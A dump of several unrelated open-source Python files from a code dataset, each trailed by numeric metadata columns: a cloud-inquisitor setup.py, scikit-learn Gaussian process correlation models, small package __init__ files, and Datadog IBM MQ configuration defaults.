        # Leaves stale jobs with a different job ID alone
        assert other_stale_job.is_stale()
| 27.021505
| 73
| 0.651413
| 327
| 2,513
| 4.743119
| 0.159021
| 0.118633
| 0.083817
| 0.077369
| 0.814313
| 0.760799
| 0.733075
| 0.733075
| 0.691167
| 0.691167
| 0
| 0.00217
| 0.266614
| 2,513
| 92
| 74
| 27.315217
| 0.839392
| 0.070434
| 0
| 0.753846
| 0
| 0
| 0.007725
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 1
| 0.092308
| false
| 0
| 0.061538
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0ee1fe8af2c2998091ecd8b9201dbe5e0121df6b
| 6,707
|
py
|
Python
|
backend/setup.py
|
jtimberlake/cloud-inquisitor
|
9ab260d6c3f35d496c2d8f888f9836b5afe9d06b
|
[
"Apache-2.0"
] | 462
|
2017-11-27T20:53:25.000Z
|
2022-03-26T18:32:50.000Z
|
backend/setup.py
|
RiotGames/cloud-inquisitor
|
29a26c705381fdba3538b4efedb25b9e09b387ed
|
[
"Apache-2.0"
] | 103
|
2017-11-28T14:33:26.000Z
|
2020-11-06T20:01:11.000Z
|
backend/setup.py
|
jtimberlake/cloud-inquisitor
|
9ab260d6c3f35d496c2d8f888f9836b5afe9d06b
|
[
"Apache-2.0"
] | 58
|
2017-11-28T00:49:12.000Z
|
2022-03-26T18:32:44.000Z
|
# Packaging configuration for the cloud-inquisitor backend.
# The entry_points groups below are how the application discovers its
# plugins (CLI commands, notifiers, resource types, account types and API
# views) at runtime.
import setuptools

setuptools.setup(
    name='cloud_inquisitor',
    version='3.0.0',
    entry_points={
        # Executable installed into the environment's bin/ directory.
        'console_scripts': [
            'cloud-inquisitor = cloud_inquisitor.cli:cli'
        ],
        # CLI sub-commands, loaded as plugins.
        'cloud_inquisitor.plugins.commands': [
            'auth = cloud_inquisitor.plugins.commands.auth:Auth',
            'import-saml = cloud_inquisitor.plugins.commands.saml:ImportSAML',
            'list_plugins = cloud_inquisitor.plugins.commands.plugins:ListPlugins',
            'scheduler = cloud_inquisitor.plugins.commands.scheduler:Scheduler',
            'setup = cloud_inquisitor.plugins.commands.setup:Setup',
            'userdata = cloud_inquisitor.plugins.commands.userdata:UserData',
            'worker = cloud_inquisitor.plugins.commands.scheduler:Worker',
        ],
        # Outbound notification backends.
        'cloud_inquisitor.plugins.notifiers': [
            'email_notify = cloud_inquisitor.plugins.notifiers.email:EmailNotifier',
            'slack_notify = cloud_inquisitor.plugins.notifiers.slack:SlackNotifier',
        ],
        # Auditable cloud resource types.
        'cloud_inquisitor.plugins.types': [
            'ami_type = cloud_inquisitor.plugins.types.resources:AMI',
            'beanstalk_type = cloud_inquisitor.plugins.types.resources:BeanStalk',
            'cloudfrontdist_type = cloud_inquisitor.plugins.types.resources:CloudFrontDist',
            'dnsrecord_type = cloud_inquisitor.plugins.types.resources:DNSRecord',
            'dnszone_type = cloud_inquisitor.plugins.types.resources:DNSZone',
            'ebssnapshot_type = cloud_inquisitor.plugins.types.resources:EBSSnapshot',
            'ebsvolume_type = cloud_inquisitor.plugins.types.resources:EBSVolume',
            'ec2instance_type = cloud_inquisitor.plugins.types.resources:EC2Instance',
            'rdsinstance_type = cloud_inquisitor.plugins.types.resources:RDSInstance',
            's3bucket_type = cloud_inquisitor.plugins.types.resources:S3Bucket',
            'vpc_type = cloud_inquisitor.plugins.types.resources:VPC'
        ],
        # Supported account types (AWS plus DNS providers).
        'cloud_inquisitor.plugins.types.accounts': [
            'AWS = cloud_inquisitor.plugins.types.accounts:AWSAccount',
            'DNS: AXFR = cloud_inquisitor.plugins.types.accounts:AXFRAccount',
            'DNS: CloudFlare = cloud_inquisitor.plugins.types.accounts:CloudFlareAccount',
        ],
        # No built-in schedulers; supplied by external plugin packages.
        'cloud_inquisitor.plugins.schedulers': [],
        # REST API view plugins.
        'cloud_inquisitor.plugins.views': [
            'account_details = cloud_inquisitor.plugins.views.accounts:AccountDetail',
            'account_imex = cloud_inquisitor.plugins.views.accounts:AccountImportExport',
            'account_list = cloud_inquisitor.plugins.views.accounts:AccountList',
            'auditlog_get = cloud_inquisitor.plugins.views.auditlog:AuditLogGet',
            'auditlog_list = cloud_inquisitor.plugins.views.auditlog:AuditLogList',
            'config = cloud_inquisitor.plugins.views.config:ConfigGet',
            'config_import_export = cloud_inquisitor.plugins.views.config:ConfigImportExport',
            'config_list = cloud_inquisitor.plugins.views.config:ConfigList',
            'config_namespace_get = cloud_inquisitor.plugins.views.config:NamespaceGet',
            'config_namespace_list = cloud_inquisitor.plugins.views.config:Namespaces',
            'email = cloud_inquisitor.plugins.views.emails:EmailGet',
            'email_list = cloud_inquisitor.plugins.views.emails:EmailList',
            'log = cloud_inquisitor.plugins.views.logs:Logs',
            'log_details = cloud_inquisitor.plugins.views.logs:LogDetails',
            'metadata = cloud_inquisitor.plugins.views.metadata:MetaData',
            'password_reset = cloud_inquisitor.plugins.views.users:PasswordReset',
            'role_get = cloud_inquisitor.plugins.views.roles:RoleGet',
            'role_list = cloud_inquisitor.plugins.views.roles:RoleList',
            'search = cloud_inquisitor.plugins.views.search:Search',
            'stats = cloud_inquisitor.plugins.views.stats:StatsGet',
            'template_get = cloud_inquisitor.plugins.views.templates:TemplateGet',
            'template_list = cloud_inquisitor.plugins.views.templates:TemplateList',
            'user_details = cloud_inquisitor.plugins.views.users:UserDetails',
            'user_list = cloud_inquisitor.plugins.views.users:UserList',
        ]
    },
    packages=setuptools.find_packages(
        exclude=[
            '*.tests',
            '*.tests.*',
            'tests.*',
            'tests'
        ]
    ),
    include_package_data=True,
    zip_safe=False,

    # Requirements for setup and installation
    setup_requires=['setuptools_scm'],
    install_requires=[
        'Flask-Compress~=1.4',
        'Flask-Migrate~=2.1',
        'Flask-RESTful~=0.3',
        'Flask-SQLAlchemy~=2.3',
        'Flask-Script~=2.0',
        'Flask~=0.12',
        'Jinja2~=2.9',
        'MarkupSafe~=1.0',
        'PyJWT~=1.5',
        'SQLAlchemy~=1.1',
        'argon2-cffi~=16.3',
        'boto3~=1.9',
        'click~=6.7',
        'enum34~=1.1',
        'flake8-comprehensions~=1.4',
        'flake8-deprecated~=1.2',
        'flake8-pep3101~=1.1',
        'flake8-quotes~=0.9',
        'flake8~=3.3',
        'gunicorn~=19.7',
        'ipython~=6.2',
        'moto~=1.3',
        'munch~=2.1',
        'mysqlclient~=1.3',
        'pyexcel-xlsx~=0.5',
        'pytest~=5.0',
        'pytest-cov~=2.6',
        'rainbow-logging-handler~=2.2',
        'requests~=2.19',
        'slackclient~=1.0',
        'sqlservice~=0.20',
    ],

    # Metadata
    description='Tool to enforce ownership and data security within cloud environments',
    long_description='Please see https://github.com/RiotGames/cloud-inquisitor for more information',
    author='Riot Games Security',
    author_email='security@riotgames.com',
    url='https://github.com/RiotGames/cloud-inquisitor',
    license='Apache 2.0',
    classifiers=[
        # Current project status
        'Development Status :: 4 - Beta',

        # Audience
        'Intended Audience :: System Administrators',
        'Intended Audience :: Information Technology',

        # License information
        'License :: OSI Approved :: Apache Software License',

        # Supported python versions
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',

        # Frameworks used
        'Framework :: Flask',

        # Supported OS's
        'Operating System :: MacOS :: MacOS X',
        'Operating System :: POSIX :: Linux',
        'Operating System :: Unix',

        # Extra metadata
        'Environment :: Console',
        'Natural Language :: English',
        'Topic :: Security',
        'Topic :: Utilities',
    ],
    keywords='cloud security',
)
| 41.658385
| 101
| 0.635306
| 663
| 6,707
| 6.27451
| 0.331825
| 0.209135
| 0.280288
| 0.16226
| 0.404327
| 0.141827
| 0
| 0
| 0
| 0
| 0
| 0.018631
| 0.23975
| 6,707
| 160
| 102
| 41.91875
| 0.797215
| 0.025645
| 0
| 0.051852
| 0
| 0
| 0.686284
| 0.412107
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.007407
| 0.02963
| 0
| 0.02963
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0efbc69823e33452fa11d2e01ca926d4548e77bf
| 129
|
py
|
Python
|
gQuant/plugins/cusignal_plugin/greenflow_cusignal_plugin/convolution/__init__.py
|
t-triobox/gQuant
|
6ee3ba104ce4c6f17a5755e7782298902d125563
|
[
"Apache-2.0"
] | null | null | null |
gQuant/plugins/cusignal_plugin/greenflow_cusignal_plugin/convolution/__init__.py
|
t-triobox/gQuant
|
6ee3ba104ce4c6f17a5755e7782298902d125563
|
[
"Apache-2.0"
] | null | null | null |
gQuant/plugins/cusignal_plugin/greenflow_cusignal_plugin/convolution/__init__.py
|
t-triobox/gQuant
|
6ee3ba104ce4c6f17a5755e7782298902d125563
|
[
"Apache-2.0"
] | null | null | null |
from .convolve import *
from .correlate import *
from .fftconvolve import *
from .convolve2d import *
from .correlate2d import *
| 21.5
| 26
| 0.767442
| 15
| 129
| 6.6
| 0.466667
| 0.40404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018349
| 0.155039
| 129
| 5
| 27
| 25.8
| 0.889908
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1678e70fc56062104c898fa9e2417c740e03b325
| 7,654
|
py
|
Python
|
lib/python2.7/site-packages/sklearn/gaussian_process/correlation_models.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 6,989
|
2017-07-18T06:23:18.000Z
|
2022-03-31T15:58:36.000Z
|
lib/python2.7/site-packages/sklearn/gaussian_process/correlation_models.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 1,978
|
2017-07-18T09:17:58.000Z
|
2022-03-31T14:28:43.000Z
|
lib/python2.7/site-packages/sklearn/gaussian_process/correlation_models.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 1,228
|
2017-07-18T09:03:13.000Z
|
2022-03-29T05:57:40.000Z
|
# -*- coding: utf-8 -*-
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# (mostly translation, see implementation details)
# License: BSD 3 clause
"""
The built-in correlation models submodule for the gaussian_process module.
"""
import numpy as np
def absolute_exponential(theta, d):
    """
    Absolute exponential autocorrelation model.
    (Ornstein-Uhlenbeck stochastic process)::

                                          n
        theta, d --> r(theta, d) = exp(  sum  - theta_i * |d_i| )
                                        i = 1

    Parameters
    ----------
    theta : array_like
        An array with shape 1 (isotropic) or n (anisotropic) giving the
        autocorrelation parameter(s).

    d : array_like
        An array with shape (n_eval, n_features) giving the componentwise
        distances between locations x and x' at which the correlation model
        should be evaluated.  A 1-D array is treated as (n_eval, 1).

    Returns
    -------
    r : array_like
        An array with shape (n_eval, ) containing the values of the
        autocorrelation model.
    """
    theta = np.asarray(theta, dtype=np.float64)
    d = np.abs(np.asarray(d, dtype=np.float64))

    if d.ndim > 1:
        n_features = d.shape[1]
    else:
        # Fix: the original left a 1-D d unchanged here, so the axis=1
        # reductions below raised; reshape to the documented 2-D layout.
        n_features = 1
        d = d.reshape(-1, 1)

    if theta.size == 1:
        # Isotropic: one theta shared across all features.
        return np.exp(- theta[0] * np.sum(d, axis=1))
    elif theta.size != n_features:
        raise ValueError("Length of theta must be 1 or %s" % n_features)
    else:
        # Anisotropic: one theta per feature.
        return np.exp(- np.sum(theta.reshape(1, n_features) * d, axis=1))
def squared_exponential(theta, d):
    """
    Squared exponential correlation model (Radial Basis Function).
    (Infinitely differentiable stochastic process, very smooth)::

                                          n
        theta, d --> r(theta, d) = exp(  sum  - theta_i * (d_i)^2 )
                                        i = 1

    Parameters
    ----------
    theta : array_like
        An array with shape 1 (isotropic) or n (anisotropic) giving the
        autocorrelation parameter(s).

    d : array_like
        An array with shape (n_eval, n_features) giving the componentwise
        distances between locations x and x' at which the correlation model
        should be evaluated.  A 1-D array is treated as (n_eval, 1).

    Returns
    -------
    r : array_like
        An array with shape (n_eval, ) containing the values of the
        autocorrelation model.
    """
    theta = np.asarray(theta, dtype=np.float64)
    d = np.asarray(d, dtype=np.float64)

    if d.ndim > 1:
        n_features = d.shape[1]
    else:
        # Fix: the original left a 1-D d unchanged here, so the axis=1
        # reductions below raised; reshape to the documented 2-D layout.
        n_features = 1
        d = d.reshape(-1, 1)

    if theta.size == 1:
        # Isotropic: one theta shared across all features.
        return np.exp(-theta[0] * np.sum(d ** 2, axis=1))
    elif theta.size != n_features:
        raise ValueError("Length of theta must be 1 or %s" % n_features)
    else:
        # Anisotropic: one theta per feature.
        return np.exp(-np.sum(theta.reshape(1, n_features) * d ** 2, axis=1))
def generalized_exponential(theta, d):
    """
    Generalized exponential correlation model.
    (Useful when one does not know the smoothness of the function to be
    predicted.)::

                                          n
        theta, d --> r(theta, d) = exp(  sum  - theta_i * |d_i|^p )
                                        i = 1

    Parameters
    ----------
    theta : array_like
        An array with shape 1+1 (isotropic) or n+1 (anisotropic) giving the
        autocorrelation parameter(s) (theta, p).

    d : array_like
        An array with shape (n_eval, n_features) giving the componentwise
        distances between locations x and x' at which the correlation model
        should be evaluated.  A 1-D array is treated as (n_eval, 1).

    Returns
    -------
    r : array_like
        An array with shape (n_eval, ) with the values of the autocorrelation
        model.
    """
    theta = np.asarray(theta, dtype=np.float64)
    d = np.asarray(d, dtype=np.float64)

    if d.ndim > 1:
        n_features = d.shape[1]
    else:
        # Fix: keep d 2-D as documented so the axis=1 reduction below works.
        n_features = 1
        d = d.reshape(-1, 1)

    lth = theta.size
    if n_features > 1 and lth == 2:
        # Broadcast the single theta over all features, keeping p last.
        # Fix: np.hstack returns a 1-D array, so the 2-D indexing below
        # (theta[:, 0:-1]) raised IndexError; reshape to (1, n_features + 1).
        theta = np.hstack([np.repeat(theta[0], n_features),
                           theta[1]]).reshape(1, n_features + 1)
    elif lth != n_features + 1:
        raise Exception("Length of theta must be 2 or %s" % (n_features + 1))
    else:
        theta = theta.reshape(1, lth)

    # theta[:, 0:-1] are the per-feature scales; theta[:, -1] is the power p.
    td = theta[:, 0:-1].reshape(1, n_features) * np.abs(d) ** theta[:, -1]
    r = np.exp(- np.sum(td, 1))
    return r
def pure_nugget(theta, d):
    """
    Spatial independence correlation model (pure nugget).
    (Useful when one wants to solve an ordinary least squares problem!)::

                                           n
        theta, d --> r(theta, d) = 1 if   sum |d_i| == 0
                                         i = 1
                                   0 otherwise

    Parameters
    ----------
    theta : array_like
        None.

    d : array_like
        An array with shape (n_eval, n_features) giving the componentwise
        distances between locations x and x' at which the correlation model
        should be evaluated.

    Returns
    -------
    r : array_like
        An array with shape (n_eval, ) with the values of the autocorrelation
        model.
    """
    theta = np.asarray(theta, dtype=np.float64)
    d = np.asarray(d, dtype=np.float64)

    # A location correlates only with itself: r_i is 1 exactly when every
    # component of row i is zero, and 0 otherwise.
    coincident = np.all(d == 0., axis=1)
    return np.where(coincident, 1., 0.)
def cubic(theta, d):
    """
    Cubic correlation model::

        theta, d --> r(theta, d) =
          n
         prod max(0, 1 - 3(theta_j*d_ij)^2 + 2(theta_j*d_ij)^3) ,  i = 1,...,m
        j = 1

    Parameters
    ----------
    theta : array_like
        An array with shape 1 (isotropic) or n (anisotropic) giving the
        autocorrelation parameter(s).

    d : array_like
        An array with shape (n_eval, n_features) giving the componentwise
        distances between locations x and x' at which the correlation model
        should be evaluated.

    Returns
    -------
    r : array_like
        An array with shape (n_eval, ) with the values of the autocorrelation
        model.
    """
    theta = np.asarray(theta, dtype=np.float64)
    d = np.asarray(d, dtype=np.float64)

    n_features = d.shape[1] if d.ndim > 1 else 1
    lth = theta.size

    if lth == 1:
        # Isotropic: a single theta scales every feature.
        scaled = np.abs(d) * theta
    elif lth != n_features:
        raise Exception("Length of theta must be 1 or " + str(n_features))
    else:
        # Anisotropic: one theta per feature.
        scaled = np.abs(d) * theta.reshape(1, n_features)

    # Clamp at 1 so the cubic polynomial stays in [0, 1].
    scaled = np.minimum(scaled, 1.)
    poly = 1. - scaled ** 2. * (3. - 2. * scaled)
    return np.prod(poly, 1)
def linear(theta, d):
    """
    Linear correlation model::

        theta, d --> r(theta, d) =
              n
            prod max(0, 1 - theta_j*d_ij) ,  i = 1,...,m
            j = 1

    Parameters
    ----------
    theta : array_like
        An array with shape 1 (isotropic) or n (anisotropic) giving the
        autocorrelation parameter(s).

    d : array_like
        An array with shape (n_eval, n_features) giving the componentwise
        distances between locations x and x' at which the correlation model
        should be evaluated.

    Returns
    -------
    r : array_like
        An array with shape (n_eval, ) with the values of the autocorrelation
        model.
    """
    theta = np.asarray(theta, dtype=np.float64)
    d = np.asarray(d, dtype=np.float64)

    n_features = d.shape[1] if d.ndim > 1 else 1
    lth = theta.size

    if lth == 1:
        # Isotropic: a single theta scales every feature.
        scaled = np.abs(d) * theta
    elif lth != n_features:
        raise Exception("Length of theta must be 1 or %s" % n_features)
    else:
        # Anisotropic: one theta per feature.
        scaled = np.abs(d) * theta.reshape(1, n_features)

    # Clamp at 1 so each factor max(0, 1 - theta_j*d_ij) stays non-negative.
    return np.prod(1. - np.minimum(scaled, 1.), 1)
| 26.85614
| 78
| 0.559969
| 1,035
| 7,654
| 4.06087
| 0.136232
| 0.070664
| 0.044492
| 0.064716
| 0.749465
| 0.749465
| 0.735427
| 0.727576
| 0.71901
| 0.71901
| 0
| 0.022572
| 0.328586
| 7,654
| 284
| 79
| 26.950704
| 0.795291
| 0.54821
| 0
| 0.701149
| 0
| 0
| 0.052379
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.011494
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
167fa736ddf201da2a8ff33112b9163c9c9c6da7
| 34
|
py
|
Python
|
rockstarpy/__init__.py
|
yanorestes/rockstar-py
|
0e4fe54f8677903e55c60edeee5f097c6139bef2
|
[
"MIT"
] | 48
|
2018-07-24T18:55:38.000Z
|
2019-11-05T23:06:51.000Z
|
rockstarpy/__init__.py
|
yyyyyyyyyyan/rockstar-py
|
0e4fe54f8677903e55c60edeee5f097c6139bef2
|
[
"MIT"
] | 29
|
2018-07-24T23:18:15.000Z
|
2019-02-24T23:22:31.000Z
|
rockstarpy/__init__.py
|
yanorestes/rockstar-py
|
0e4fe54f8677903e55c60edeee5f097c6139bef2
|
[
"MIT"
] | 19
|
2018-07-24T22:43:29.000Z
|
2019-04-03T12:30:12.000Z
|
from .transpile import Transpiler
| 17
| 33
| 0.852941
| 4
| 34
| 7.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
16ace52b4ab618498ba5393fa71f714b0855addc
| 29
|
py
|
Python
|
submitter/__init__.py
|
Sorosliu1029/LeetCode
|
4aefc25a2095b6c06004d06dc9e45fa3db26dc12
|
[
"MIT"
] | 1
|
2022-01-14T07:59:49.000Z
|
2022-01-14T07:59:49.000Z
|
submitter/__init__.py
|
Sorosliu1029/LeetCode
|
4aefc25a2095b6c06004d06dc9e45fa3db26dc12
|
[
"MIT"
] | null | null | null |
submitter/__init__.py
|
Sorosliu1029/LeetCode
|
4aefc25a2095b6c06004d06dc9e45fa3db26dc12
|
[
"MIT"
] | null | null | null |
from .Submitter import submit
| 29
| 29
| 0.862069
| 4
| 29
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
16df631d88bd99d5c293b28124cd1c19cfa08bff
| 31
|
py
|
Python
|
rapidenv/git/__init__.py
|
innoviz-sw-infra/rapid-env
|
acc5e1e461af42b5fbb7024c0b79d4315c206fe2
|
[
"MIT"
] | 1
|
2021-02-15T20:55:49.000Z
|
2021-02-15T20:55:49.000Z
|
rapidenv/git/__init__.py
|
innoviz-sw-infra/rapid-env
|
acc5e1e461af42b5fbb7024c0b79d4315c206fe2
|
[
"MIT"
] | null | null | null |
rapidenv/git/__init__.py
|
innoviz-sw-infra/rapid-env
|
acc5e1e461af42b5fbb7024c0b79d4315c206fe2
|
[
"MIT"
] | null | null | null |
from .git import add_gitignore
| 15.5
| 30
| 0.83871
| 5
| 31
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bc60a34cff8e3ad297d167a268e5639eb89db5b4
| 47
|
py
|
Python
|
multiprocessing_tools/__init__.py
|
smwa/multiprocessing_tools
|
11f00f0cc12cf1b23a6e3a9daafaf8c98529a6e7
|
[
"MIT"
] | null | null | null |
multiprocessing_tools/__init__.py
|
smwa/multiprocessing_tools
|
11f00f0cc12cf1b23a6e3a9daafaf8c98529a6e7
|
[
"MIT"
] | null | null | null |
multiprocessing_tools/__init__.py
|
smwa/multiprocessing_tools
|
11f00f0cc12cf1b23a6e3a9daafaf8c98529a6e7
|
[
"MIT"
] | null | null | null |
from .multiprocessing_tools import map, filter
| 23.5
| 46
| 0.851064
| 6
| 47
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 47
| 1
| 47
| 47
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bcbacb72bbd0a9a00efabf23e3328bbf0628fce2
| 375
|
py
|
Python
|
wordpress_xmlrpc/methods/__init__.py
|
hishamnajam/python-wordpress-xmlrpc
|
8270a9f629b7d097e59ac5c649f41c8c1ee322a8
|
[
"MIT"
] | 218
|
2015-01-12T02:05:07.000Z
|
2022-03-27T19:11:10.000Z
|
wordpress_xmlrpc/methods/__init__.py
|
kholidfu/python-wordpress-xmlrpc
|
7ac0a6e9934fdbf02c2250932e0c026cf530d400
|
[
"MIT"
] | 80
|
2015-01-17T18:52:05.000Z
|
2022-03-06T18:09:17.000Z
|
wordpress_xmlrpc/methods/__init__.py
|
kholidfu/python-wordpress-xmlrpc
|
7ac0a6e9934fdbf02c2250932e0c026cf530d400
|
[
"MIT"
] | 90
|
2015-01-25T22:41:37.000Z
|
2022-02-25T14:20:29.000Z
|
"""
Implementations of standard WordPress XML-RPC APIs.
"""
from wordpress_xmlrpc.methods import posts
from wordpress_xmlrpc.methods import pages
from wordpress_xmlrpc.methods import demo
from wordpress_xmlrpc.methods import users
from wordpress_xmlrpc.methods import options
from wordpress_xmlrpc.methods import comments
from wordpress_xmlrpc.methods import media
| 34.090909
| 52
| 0.837333
| 49
| 375
| 6.265306
| 0.367347
| 0.296417
| 0.433225
| 0.592834
| 0.729642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122667
| 375
| 10
| 53
| 37.5
| 0.933131
| 0.136
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4c4dd80fae46758e649d33cb53a3f626eb63a2a9
| 2,860
|
py
|
Python
|
ibm_mq/datadog_checks/ibm_mq/config_models/defaults.py
|
aymeric-ledizes/integrations-core
|
8386537099f5497a05192b97e69d97d47e316f78
|
[
"BSD-3-Clause"
] | null | null | null |
ibm_mq/datadog_checks/ibm_mq/config_models/defaults.py
|
aymeric-ledizes/integrations-core
|
8386537099f5497a05192b97e69d97d47e316f78
|
[
"BSD-3-Clause"
] | null | null | null |
ibm_mq/datadog_checks/ibm_mq/config_models/defaults.py
|
aymeric-ledizes/integrations-core
|
8386537099f5497a05192b97e69d97d47e316f78
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# This file is autogenerated.
# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:
# ddev -x validate config -s <INTEGRATION_NAME>
# ddev -x validate models -s <INTEGRATION_NAME>
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_service(field, value):
return get_default_field_value(field, value)
def instance_auto_discover_channels(field, value):
return True
def instance_auto_discover_queues(field, value):
return False
def instance_channel_status_mapping(field, value):
return get_default_field_value(field, value)
def instance_channels(field, value):
return get_default_field_value(field, value)
def instance_collect_statistics_metrics(field, value):
return False
def instance_connection_name(field, value):
return get_default_field_value(field, value)
def instance_convert_endianness(field, value):
return False
def instance_disable_generic_tags(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_host(field, value):
return 'localhost'
def instance_metric_patterns(field, value):
return get_default_field_value(field, value)
def instance_min_collection_interval(field, value):
return 15
def instance_mqcd_version(field, value):
return 6
def instance_override_hostname(field, value):
return False
def instance_password(field, value):
return get_default_field_value(field, value)
def instance_port(field, value):
return 1414
def instance_queue_manager_timezone(field, value):
return 'Etc/UTC'
def instance_queue_patterns(field, value):
return get_default_field_value(field, value)
def instance_queue_regex(field, value):
return get_default_field_value(field, value)
def instance_queue_tag_re(field, value):
return get_default_field_value(field, value)
def instance_queues(field, value):
return get_default_field_value(field, value)
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_ssl_auth(field, value):
return False
def instance_ssl_certificate_label(field, value):
return get_default_field_value(field, value)
def instance_ssl_cipher_spec(field, value):
return 'TLS_RSA_WITH_AES_256_CBC_SHA'
def instance_ssl_key_repository_location(field, value):
return '/var/mqm/ssl-db/client/KeyringClient'
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 5
def instance_try_basic_auth(field, value):
return True
def instance_username(field, value):
return get_default_field_value(field, value)
| 21.185185
| 105
| 0.777972
| 399
| 2,860
| 5.275689
| 0.318296
| 0.285036
| 0.235629
| 0.142518
| 0.539192
| 0.539192
| 0.433729
| 0.395724
| 0.395724
| 0.373872
| 0
| 0.006563
| 0.147552
| 2,860
| 134
| 106
| 21.343284
| 0.85685
| 0.118881
| 0
| 0.365079
| 1
| 0
| 0.031847
| 0.025478
| 0
| 0
| 0
| 0
| 0
| 1
| 0.492063
| false
| 0.015873
| 0.015873
| 0.492063
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
